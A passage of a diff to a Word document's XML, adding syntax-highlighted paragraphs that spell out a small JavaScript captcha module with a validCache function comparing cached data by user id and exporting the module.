+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>validCache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>function</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>uid</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'////////////////////////////'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'////////////////////////////'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>return</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>uid</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">] === </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>            });</w:t>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>module</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>exports</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
